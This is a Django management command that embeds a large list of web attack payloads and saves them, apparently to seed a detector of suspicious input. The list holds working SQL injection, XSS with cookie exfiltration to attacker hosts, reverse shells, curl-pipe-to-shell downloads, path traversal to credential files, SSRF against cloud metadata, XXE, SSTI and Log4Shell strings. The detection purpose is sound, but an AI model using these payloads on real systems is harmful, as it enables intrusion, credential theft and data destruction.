from django.core.management.base import BaseCommand
from tools.storage import save_suspicious_payload
from sentence_transformers import SentenceTransformer
import numpy as np

class Command(BaseCommand):
    def handle(self, *args, **kwargs):
        MODEL = SentenceTransformer("all-MiniLM-L6-v2")

        payloads = [
  # SQL PAYLOADS
    "' OR '1'='1",
    "'' OR '1'='1' --",
    "\" OR 'x'='x\"",
    "admin' OR 1=1--",
    "1' OR '1'='1",
    "1 OR 1=1",
    "'; DROP TABLE users; --",
    "'; SELECT SLEEP(5); --",
    "'; EXEC xp_cmdshell('dir'); --",
    "UNION SELECT NULL,NULL--",
    "UNION SELECT username,password FROM users--",
    "UNION SELECT table_name, null FROM information_schema.tables--",
    "1' AND '1'='1",
    "') OR ('a'='a",
    "') OR 1=1/*",
    "') OR ('x'='x",
    "admin'/*",
    "admin' --",
    "%27%20OR%201%3D1--",
    "%2527%2520OR%25201%253D1--",
    "0x27 OR 1=1--",
    "%c0%27 OR 1=1--",
    "%bf%27 OR 1=1--",
    "1' AND (SELECT 1 FROM pg_sleep(5))--",
    "1 AND BENCHMARK(10000000,MD5(1))--",
    "'; WAITFOR DELAY '0:0:05'--",
    "' OR SLEEP(5)--",
    "1' AND SLEEP(2) AND '1'='1",
    "' OR IF(1=1,SLEEP(3),0)--",
    "' HAVING 1=1--",
    "GROUP BY username HAVING 1=1--",
    "') UNION SELECT load_file('/etc/passwd'),null--",
    "\" OR \"\" = \"\" --",
    "' OR ''='",
    "'%27; DROP TABLE users; --",
    "1; DROP TABLE users",
    "'; SHUTDOWN; --",
    "1' OR EXISTS(SELECT * FROM users)--",
    "AND ASCII(SUBSTRING((SELECT @@version),1,1))>52--",
    "'||' OR 'a'='a",
    "\" OR 'a'='a\"",
    "1' OR 1=1#",
    "';CREATE TABLE hacked (a INT); --",
    "';ALTER TABLE users ADD COLUMN pwned INT; --",
    "UNION ALL SELECT username,password FROM users--",
    "UNION SELECT username, password FROM mysql.user--",
    "OR 1=1 LIMIT 1",
    "1' UNION SELECT NULL, username, password FROM users--",
    "1' OR 1=1/*",
    "CONCAT(CHAR(97),CHAR(98),CHAR(99))",
    "UNION SELECT 1, LOAD_FILE('/etc/passwd')--",
    "'|| (SELECT version()) --",
    "'; DECLARE @x INT; SET @x=1; --",
    "0; EXEC xp_cmdshell('whoami')",
    "1' AND (SELECT TOP 1 name FROM sysobjects)=1--",
    "OR 1 GROUP BY CONCAT(username, password) HAVING 1=1",
    "0x27 OR 0x31=0x31--",
    "' OR '1'='1' /*",
    "1/**/OR/**/1/**/=/**/1",
    "username=1/**/OR/**/1/**/=/**/1",
    "1 OR 1=1#",
    "'%27 OR 'a'='a",
    "') OR 1=1-- -",
    "AND 1=(SELECT COUNT(*) FROM users)--",
    "';SELECT pg_sleep(10);--",
    "');EXEC('calc')--",
    "/*!50000SELECT * FROM users*/",
    "extractvalue(1,concat(0x7e,(select database()),0x7e))",
    "updatexml(1,concat(0x7e,(select @@version),0x7e),1)",
    "1; DROP TABLE auth_user;",
    "OR 1=1 ORDER BY 1--",
    "OR 1=1 LIMIT 1 OFFSET 0",
    "UNION SELECT NULL,CONCAT(username,':',password) FROM users--",
    "UNION SELECT 1,group_concat(table_name) FROM information_schema.tables--",
    "'; BEGIN; UPDATE users SET is_admin=1 WHERE id=1; COMMIT; --",
    "'; INSERT INTO admin_accounts (user) VALUES ('attacker'); --",
    "SELECT * FROM users WHERE username = '' OR 1=1 --",
    "\" OR 1=1--",
    "\" OR 1=1#",
    "1' AND SLEEP(10)--",
    "OR (SELECT CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN pg_sleep(5) END)--",
    "1' OR SUBSTRING(@@version,1,1)='5'--",
    "CONVERT(INT, (SELECT COUNT(*) FROM users))--",
    "X' OR 'X'='X",
    "') OR (SELECT * FROM users) = 1--",
    "' OR 1=1 LIMIT 1; --",
    "' OR 1=1 UNION SELECT NULL--",
    "'||' OR '1'='1'||'",
    "1' AND (SELECT ASCII(SUBSTRING((SELECT user()),1,1)))>48--",
    "UNION SELECT NULL, HEX(load_file('/etc/passwd'))--",
    "1; exec('ls')",
    "1' OR sleep(0.1)#",
    "' OR 2>1--",
    "' OR 'x'='x') OR ('x'='x",
    "or 1=1/* comment */",
    "') or 1=1 -- -",
    "1 or benchmark(1000000,sha1(1))--",
    "1 OR 0x414141=0x414141--",
    "0' OR 'a'='a",
    "username=' OR ''='",
    "\" OR sleep(5) --",
    "\" OR pg_sleep(5) --",
    "1'/**/OR/**/'1'='1",
    "0x27204f5220313d31 --",
    "'|| (SELECT table_name FROM information_schema.tables LIMIT 1) --",
    "\";exec(cmd)\"",
    "1;SELECT load_file('/etc/passwd');--",
    "' OR COALESCE((SELECT COUNT(*) FROM users),0)=0 --",
    "'||SLEEP(5)||'",
    "'\" AND (SELECT 1 FROM (SELECT(SLEEP(0)))a) --",

    
     # XSS PAYLOADS
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<iframe src=javascript:alert(1)>",
    "\"><script>alert(document.cookie)</script>",
    "'><script>alert(1)</script>",
    "\"><img src=x onerror=alert(1)>",
    "<body onload=alert('XSS')>",
    "javascript:alert(1)",
    "<svg><script>alert(1)</script></svg>",
    "\"><svg onload=alert(1)>",
    "<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert(1)\">",
    "<link rel=stylesheet href=javascript:alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<object data=javascript:alert(1)>",
    "<embed src=javascript:alert(1)>",
    "<math href='javascript:alert(1)'></math>",
    "<a href=\"javascript:alert(1)\">click</a>",
    "\"><iframe srcdoc='<script>alert(1)</script>'></iframe>",
    "<video><source onerror=\"alert(1)\"></video>",
    "<img src=\"x\" onerror=\"prompt(1)\">",
    "<img src=x onerror=confirm(1)>",
    "<scr<script>ipt>alert(1)</scr<script>ipt>",
    "'>\"<script>alert(1)</script>",
    "<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>",
    "<script>eval(atob('YWxlcnQoMSk='))</script>",
    "%3Cscript%3Ealert(1)%3C/script%3E",
    "&#60;script&#62;alert(1)&#60;/script&#62;",
    "<img src=\"x\" onerror=\"this.onerror=null;alert(1)\">",
    "\"><input autofocus onfocus=alert(1)>",
    "<form action=javascript:alert(1)><button>click</button></form>",
    "\"><svg onload=alert(String.fromCharCode(88,83,83))>",
    "<iframe onload=\"window.top.postMessage('xss','*')\">",
    "<script>location='javascript:alert(1)'</script>",
    "<body onfocus=alert(1) tabindex=1>",
    "\"><video onerror=alert(1)>",
    "<isindex type=search pattern=... onsearch=alert(1)>",
    "<input value=\"'><script>alert(1)</script>\">",
    "\"><svg><script>prompt(1)</script></svg>",
    "<p onmouseover=alert(1)>hover</p>",
    "<a href=\"#\" onclick=\"alert(1);return false\">click</a>",
    "<svg><g onload=alert(1)></g></svg>",
    "\"><link rel=\"import\" href=\"javascript:alert(1)\">",
    "<object type=\"image/svg+xml\" data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=\"></object>",
    "<script>document.write('<img src=x onerror=alert(1)>')</script>",
    "<script>setTimeout(()=>alert(1),0)</script>",
    "<iframe src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=\"></iframe>",
    "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E",
    "\"><svg/onload=alert(1)>",
    "<svg><foreignObject onload=alert(1)></foreignObject></svg>",
    "<svg><image onerror=alert(1) /></svg>",
    "'><svg><script>alert(\"x\")</script></svg>",
    "<a href=\"javascript:/*--><script>alert(1)</script>\">x</a>",
    "<form><button formaction=\"javascript:alert(1)\">go</button></form>",
    "<iframe srcdoc=\"<img src=x onerror=alert(1)>\"></iframe>",
    "\"><img src=1 onerror=alert(document.domain)>",
    "<svg><g onmousedown=alert(1)></g></svg>",
    "\"><input onkeyup=\"if(event.keyCode==13)alert(1)\">",
    "<base href=\"javascript:alert(1)//\">",
    "\"><object data=\"javascript:alert(1)\"></object>",
    "\"><script>console.log('xss')</script>",
    "\"><body onhashchange=alert(1)>",
    "<img src=x onerror=eval(\"alert(1)\")>",
    "<script>throw 1;/*alert(1)*/</script>",
    "\"%3Cscript%3Ealert(1)%3C/script%3E",
    "<svg><script>console.log(atob('YWxlcnQoMSk='))</script></svg>",
    "<template onupdate=alert(1)>",
    "<img src=1 onerror=this.src='javascript:alert(1)'>",
    "<iframe src='javascript:alert(1)'></iframe>",
    "<meta http-equiv=\"refresh\" content=\"0;url=/\\x22+alert(1)\">",
    "\"><div style=\"background:url(javascript:alert(1))\"></div>",
    "\"><object id=oo onerror=alert(1)>",
    "\"><svg onload=window.top.postMessage('xss','*')>",
    "'><svg><script>new Image().src='//attacker/p?c='+document.cookie</script></svg>",
    "<script>fetch('https://attacker/?c='+document.cookie)</script>",
    "<svg><desc><![CDATA[<script>alert(1)</script>]]></desc></svg>",
    "\"><math href=\"javascript:alert(1)\"></math>",
    "\"><input form=foo oninvalid=alert(1)>",
    "<picture><source onerror=alert(1)></picture>",
    "\"><button formaction=\"javascript:alert(1)\">x</button>",
    "<svg><animate onbegin=alert(1) /></svg>",
    "<svg><set onbegin=alert(1) /></svg>",
    "\"><script>document.domain</script>",
    "<svg><text onfocus=alert(1) tabindex=1>t</text></svg>",
    "<img srcset=\"x onerror=alert(1) 1x\">",
    "<img src=x onerror=alert(location.href)>",
    "<svg><use xlink:href=\"javascript:alert(1)\"></use></svg>",
    "\"><object data=\"data:text/html,<script>alert(1)</script>\"></object>",
    "<iframe srcdoc=\"<svg onload=alert(1)></svg>\"></iframe>",
    "<script>new Function('alert(1)')()</script>",
    "<svg><foreignObject><body onload=alert(1)></body></foreignObject></svg>",
    "\"><img src=\"data:image/svg+xml;base64,PHN2Zz48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+\" />",
    "<svg onload=\"var x=document.createElement('img');x.src='//att/p?c='+document.cookie;document.body.appendChild(x)\">",
    "<input value=\"%3Cscript%3Ealert(1)%3C/script%3E\">",
    "<svg><script async>alert(1)</script></svg>",
    "<iframe srcdoc=\"<input onfocus=alert(1) autofocus>\"></iframe>",
    "<svg><image xlink:href=\"data:image/svg+xml;utf8,<script>alert(1)</script>\"></image></svg>",
    "<body onpointerdown=alert(1) tabindex=0>",
    "<svg><text onmousemove=alert(1)>x</text></svg>",
    "<a href=\"data:text/html,<script>alert(1)</script>\">x</a>",
    "<svg><script>setInterval(()=>alert(1),1000)</script></svg>",
    "<script>location='data:text/html,<script>alert(1)</script>'</script>",
    "\"><div onclick=\"eval('alert(1)')\">x</div>",
    "<template contenteditable oninput=alert(1)>x</template>",
    "<svg><image onerror=\"this.ownerDocument.defaultView.alert(1)\"></image></svg>",
    "<svg><script>parent.alert(1)</script></svg>",
    "<svg><script>top.alert(1)</script></svg>",
    #cOMMAND Injection
       "; ls -la",
    "; cat /etc/passwd",
    "| cat /etc/passwd",
    "&& whoami",
    "|| id",
    "`id`",
    "$(whoami)",
    "; curl http://attacker/p",
    "; wget http://evil/a.sh; sh a;",
    "; nc attacker 4444 -e /bin/sh",
    "; bash -i >& /dev/tcp/evil.com/4444 0>&1",
    "; ping -c 4 8.8.8.8",
    "; rm -rf / #",
    "; shutdown -h now",
    "; powershell -Command \"Start-Process calc.exe\"",
    "; perl -e 'exec \"/bin/sh\";'",
    "'; exec('/bin/bash'); --",
    "| bash -i >& /dev/tcp/1.2.3.4/1234 0>&1",
    "$(${IFS}PATH=/bin;ls)",
    "; nc -e /bin/sh 10.0.0.1 4444",
    "; mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | nc attacker 4444 > /tmp/f",
    "$(curl attacker/payload.sh)",
    "; python -c 'import os; os.system(\"id\")'",
    ";perl -MIO -e '$p=qq{/bin/sh -i};'",
    "; powershell -NoProfile -WindowStyle Hidden -Command \"IEX(New-Object Net.WebClient).DownloadString('http://evil')\"",
    "; at now + 1 minute 'rm -rf /tmp/*'",
    "| /bin/bash -c 'cat /etc/passwd'",
    "; awk 'BEGIN{system(\"whoami\")}'",
    "; php -r 'system(\"id\");'",
    "$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLnBvcnQ= | base64 -d | sh)",
    "; telnet attacker 4444",
    "; ftp attacker <<EOF",
    "; echo hacked >> /tmp/hacked",
    #path traversal 
    "../../../../etc/passwd",
    "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
    "/var/www/html/../../../../etc/passwd",
    "..%2f..%2f..%2fetc%2fpasswd",
    "..%5c..%5c..%5cwindows\\system.ini",
    "....//....//....//etc/passwd",
    "..%c0%af..%c0%afetc/passwd",
    "/../../../../../../boot.ini",
    "/../../../../../../root/.ssh/id_rsa",
    "../../../../etc/shadow",
    "..\\..\\..\\config\\database.yml",
    "/proc/self/environ",
    "/etc/hosts%00",
    "/etc/passwd%00",
    "..%00/..%00/..%00/etc/passwd",
    "..//////..//////etc/passwd",
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    ".././.././../etc/passwd",
    "..\\..\\..\\..\\..\\..\\windows\\win.ini",
    "/../../../../../../windows/system32/config/sam",
    "file:///etc/passwd",
    "../../../../../etc/ssh/ssh_config",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "..%5C..%5C..%5C..%5Cwindows\\system32\\drivers\\etc\\hosts",
    "..%2f%2e%2e%2fetc%2fpasswd",
    "/etc/passwd\0",
    "..%2e%2e%2f..%2e%2e%2fetc%2fpasswd",
    "/var/log/../run/../etc/passwd",
    "../../../../boot.ini",
    "../../../../../../proc/self/cmdline",
       # SSRF & Internal Service Access
    "http://127.0.0.1/admin",
    "http://localhost:8080",
    "http://0.0.0.0:80",
    "http://[::1]/",
    "http://10.0.0.1/internal",
    "http://192.168.1.1/admin",
    "http://169.254.169.254/latest/meta-data/",
    "http://127.0.0.1:2375/v1.24/containers/json",
    "file:///etc/passwd",
    "dict://127.0.0.1:25/",
    "gopher://127.0.0.1:11211/_stats",
    "http://127.1/",
    "http://2130706433/",
    "http://0x7f000001/",
    "http://169.254.169.254/computeMetadata/v1/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://169.254.169.254/",
    "https://169.254.169.254/",
    "http://169.254.169.254/computeMetadata/v1/project/project-id",
    "http://unix:/var/run/docker.sock:/containers/json",
    "http://[::ffff:127.0.0.1]/",
    "http://localhost%00.attacker.com/",
    "file://C:\\Windows\\System32\\drivers\\etc\\hosts",
    "http://10.255.255.1/",
    "http://example.com@169.254.169.254/",
    "http://%5b::1%5d/",
    "http://[127.0.0.1]:80/",
    "http://169.254.169.254/latest/meta-data/../",

    # XXE (XML External Entity)
    '<!ENTITY xxe SYSTEM "file:///etc/passwd">',
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>',
    '<?xml version=\'1.0\'?><!DOCTYPE r [<!ENTITY xxe SYSTEM \'file:///etc/shadow\'>]><r>&xxe;</r>',
    '<!DOCTYPE foo [ <!ENTITY % x SYSTEM "http://evil.com/evil.dtd"> %x; ]>',
    '<!ENTITY % xx SYSTEM "php://filter/convert.base64-encode/resource=index.php">',
    '<!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd; ]>',
    '<!ENTITY % remote SYSTEM "http://attacker.com/payload.dtd"> %remote;',
    '<!DOCTYPE root [ <!ENTITY % ext SYSTEM "file:///etc/passwd"> %ext; ]>',
    '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY % all \'<!ENTITY xxe SYSTEM "file:///etc/passwd">\'>%all;]>&xxe;',
    '<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>',
    '<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % res "<!ENTITY &#x25; ex SYSTEM \'http://attacker/?%file;\'>">%res;',
    '<?xml version="1.0"?><!DOCTYPE a [<!ELEMENT a ANY ><!ENTITY % b SYSTEM "http://attacker/dtd"> %b;]><a>&lol;</a>',
    '<!ENTITY % dtd SYSTEM "http://attacker/payload.dtd"> %dtd;',
    '<!DOCTYPE foo [<!ENTITY % remote SYSTEM "http://attacker/evil"> %remote;]>',
    '<!DOCTYPE foo [ <!ENTITY % local SYSTEM "file:///etc/passwd"> %local; ]>',
    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % d SYSTEM "file:///etc/passwd"> %d;]><foo>&xxe;</foo>',
    '<!DOCTYPE doc [ <!ENTITY % xxe SYSTEM "http://attacker/evil.dtd"> %xxe; ]>',

    # LDAP Injection
    "*)(|(objectclass=*))",
    "*))(|(uid=*",
    "(cn=*)",
    "*)(uid=*))(|(sn=*)",
    "admin*)(|(password=*))",
    "*)(!(|(cn=*)))",
    "(|(uid=*)(userPassword=*))",
    "*)(uid=*))(|(objectClass=*))",
    "(|(uid=*))(|(mail=*))",
    "*))(uid=*))(|(uid=*",
    "(|(uid=*)(cn=*))",
    "(uid=*))(|(uid=*)(sn=*))",
    "*)(&(password=*)(userPassword=*))",
    "(uid=*)(|(password=*))",

    # SSTI (Server-Side Template Injection)
    "{{7*7}}",
    "{{config.items()}}",
    "{{request.application.__dict__}}",
    "{% print('hacked') %}",
    "{{ ''.__class__.__mro__[2].__subclasses__()[40]('id',shell=True,stdout=-1).communicate() }}",
    "${{7*7}}",
    "<%= system('ls') %>",
    "#{7*7}",
    "${jndi:ldap://attacker.com/a}",
    "{{ ''.__class__.__mro__ }}",
    "{{ get_flashed_messages().__class__ }}",
    "{{ ''.__class__.__mro__[2].__subclasses__() }}",
    "{{ config.__dict__ }}",
    "{{ request.args }}",
    "{{ ''.__class__.__mro__[2].__subclasses__()[59]('cat /etc/passwd',shell=True,stdout=-1).communicate() }}",
    "{{- system('whoami') -}}",
    "$(python -c \"import os;print(os.listdir('/'))\")",
    "{% set x = joiner %}{{ x.__init__.__globals__['os'].popen('id').read() }}",

    # NoSQL / Mongo / Firebase Injection
    '{"$ne": null}',
    '{"username": {"$gt": ""}}',
    '{"$where": "function() { return this.password == \'a\' }"}',
    '{"username": {"$regex": ".*"}}',
    '{"username": {"$in": ["admin"]}}',
    '{"$or":[{"username":"admin"},{"username":{"$ne":null}}]}',
    '{"username":{"$exists":true}}',
    '{"$regex":".*"}',
    '["__proto__", {"polluted":true}]',
    '__proto__%00={"admin":true}',
    "{'$gt':''}",
    '{"$regex":"^admin"}',
    '{"$gt":""} || 1==1',
    '{ "$ne": "" }',
    "{'$nin': ['a']}",
    '{$slice: -1}',
    '{"username":{"$regex":"^.*$","$options":"i"}}',
    '{"$where":"sleep(5000)"}',
    "admin' || 1==1",
    "'$ne': ''",

    # CRLF / Open Redirect / Header Injection
    "\r\nSet-Cookie: hacked=1",
    "%0d%0aSet-Cookie:%20hacked=1",
    "\nContent-Length: 0\n\nGET / HTTP/1.1",
    "\r\n\r\n<script>alert(1)</script>",
    "https://example.com/redirect?next=http://evil.com",
    "https://example.com?url=//evil.com",
    "https://example.com?return=%2F%2Fevil.com",
    "/\nSet-Cookie: name=1",
    "http://example.com%0d%0aSet-Cookie:foo=bar",
    "http://example.com/%0d%0aContent-Length:0%0d%0a%0d%0a",
    "https://example.com?next=//attacker.com",
    "//attacker.com",
    "/\r\nLocation: http://evil/",
    "\r\nX-Injected: value",
    "%0d%0atest:1",
    "https://example.com/?redirect=https://evil.com%2f%2f",
    "/%0d%0aSet-Cookie:session=evil",
    "https://example.com/?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=",
    "https://example.com?next=%2f%5c%5cattacker.com",
    "https://example.com/?redir=javascript:alert(1)",

    # Misc / Encoded / Obfuscated / Serialization / JNDI / JWT / Other
    "${jndi:ldap://attacker.com/a}",
    "${jndi:rmi://attacker.com/b}",
    "${jndi:iiop://attacker.com/c}",
    "#{jndi:ldap://attacker.com/a}",
    "AA' OR '1'='1'--",
    'A" OR "1"="1"--',
    "%c0%af..%c0%afetc/passwd",
    "3120f09d92aaf09d91852031efbc9d31",
    "MSDwnZKq8J2RhSAx77ydMQ==",
    "OhZRO2K6kkWLKDsFg75NPqW8rdeUnBYtj0Kx8CYr5...",
    "username=amF2YXNjcmlwdDpldmFsKGF0b2IoJ1k...",
    "<?php system($_GET['cmd']); ?>",
    "<% =File.open('/etc/passwd').read %>",
    "<%= system('ls') %>",
    "__import__('os').system('id')",
    'O:8:"MongoId":1:{s:2:"$id";s:24:"...";}',
    "rO0ABXNyABFqYXZhLnV0aWwuQXJyYXlMaXN0",
    "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % x SYSTEM "http://evil/x"> %x; ]>',
    '{"alg":"HS256","typ":"JWT"} . { "sub":"1" } . signature',
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9",
    "data:;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=",
    "<% print 'hacked' %>",
    "{{ dump(app) }}",
    "${7*7}",
    "${@print(md5(1))}",
    "'; exec('/usr/bin/perl -e \"use Socket;...\"') --",
    "\\u202Eevil.com",
    "%E2%80%AEevil.com",
    "'%00' OR '1'='1'",
    "\\x00\\x00\\x00",
    "..%c0%af..%c0%af/etc/passwd",
    "<img src=1 onerror=\"this.src='//attacker/?c='+document.cookie\">",
    "$(printf 'bash -i >& /dev/tcp/att/4444 0>&1')",
    "import os; os.system('uname -a')",
    "'; db.shutdownServer(); //",
    "'; process.exit(); //",
    "-exec 'rm -rf /'",
    "'\"|python -c \"import os;os.system('id')\"",
    "'; socket.connect(\"attacker\",4444) //",
    "eval(String.fromCharCode(97,108,101,114,116,40,49,41))",
    "system(\"cat /etc/passwd\")",
    "..%2f..%2f..%2fwindows\\\\system.ini",
    "'; echo 'pwned' > /tmp/pwned; --",
    "__proto__=1",
    "constructor.prototype.polluted = true",
    "<svg onload=alert(String.fromCharCode(88,83,83))></svg>",
    "{{ config.items() }}",
    '{"__proto__": {"isAdmin": true}}',
    'var a = new ActiveXObject("WScript.Shell");a.Run("calc.exe");',
    "${{jndi:ldap://127.0.0.1:1389/Exploit}}",
    "${jndi:ldap://localhost/a}",
    "~~!@#$%^&*()_+{}|:\"<>?",
    "..//..//..//etc/passwd",
    "\\..\\..\\..\\windows\\system.ini",
    "\\x2fetc\\x2fpasswd",
    "eval(atob('YWxlcnQoMSk='))",
    "%3Csvg%20onload%3Dalert(1)%3E",
    "echo YmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLnBvcnQ= | base64 -d | sh",
    "; powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('att',4444);...\"",
    "$(curl -sSL http://attacker/p | bash)",
    '{"$regex":"^[\\\\s\\\\S]*$"}',
    "';system('ls') && echo",
    "../../../../../../../../../../etc/passwd",
    "../../../proc/self/cwd/../../etc/passwd",
    "' OR exists(select * from information_schema.tables) --",
    "<!--#exec cmd=\"/bin/ls\" -->",
    "'; db.runCommand({eval: 'sleep(10000)'})",
    "\\$(sleep 5)``",
    ")\"||alert(1);//",
    "\\n<script>alert(1)</script>",
    "{{ ''.__class__.__mro__[2].__subclasses__()[40]('ls',shell=True,stdout=-1).communicate() }}",
    "payload_b64:PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=",
    "http://127.0.0.1:80/%0aContent-Length:0%0a%0aGET / HTTP/1.1",
    "data:application/x-sql;charset=utf-8,SELECT%20*%20FROM%20users",
    "$(perl -e 'print \"X\"x1000000')",
    "\\u0000../etc/passwd",
    "..%252f..%252fetc%252fpasswd",
    "{{request.cookies.__class__}}",
    "';throw new Error('x')//",
    "'; ALTER USER postgres WITH PASSWORD 'p'; --",
    "<?php phpinfo(); ?>",
    "'; REVOKE ALL PRIVILEGES ON DATABASE mydb FROM public; --",
    "^<script>alert(1)</script>",
    "\\x3Cscript\\x3Ealert(1)\\x3C/script\\x3E",
    "'; exec('curl http://att/p -o /tmp/p; sh /tmp/p') --",
    "';CREATE OR REPLACE FUNCTION hack() RETURNS void AS $$ BEGIN EXECUTE 'rm -rf /tmp/*'; END; $$ LANGUAGE plpgsql;",
    "| curl -s http://att/p | sh",
    "0x3C737363726970743E616C6572742831293C2F737363726970743E",
    "/*<!--*/<script>alert(1)</script>/*-->*/",
    "'}__proto__={'polluted':true}//",
    "<img src=\"x\" onerror=\"new Image().src='//att?r='+document.cookie\">",
    "eval(decodeURIComponent('%61%6c%65%72%74%281%29'))",
    "';WAITFOR DELAY '00:00:10'--",
    "'; xp_cmdshell('net user attacker /add') --",
    "'; DROP INDEX users_idx; --",
    "'; LOCK TABLE users IN ACCESS EXCLUSIVE MODE; --",
    "; dd if=/dev/zero of=/tmp/payload bs=1M count=100",
    "); exec('ls') //",
    "$(perl -e 'alarm shift; exec @ARGV' 10 /bin/sh -i)",
    "'; COPY (SELECT '') TO PROGRAM 'sh -c \"curl http://att/p | sh\"'; --",
    "$(python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"att\",4444));os.dup2(s.fileno(),0);...')"
       ]


        for p in payloads:
            emb = MODEL.encode([p]).astype(np.float32)
            save_suspicious_payload(p, emb)

        self.stdout.write(self.style.SUCCESS("Saved test payloads!"))
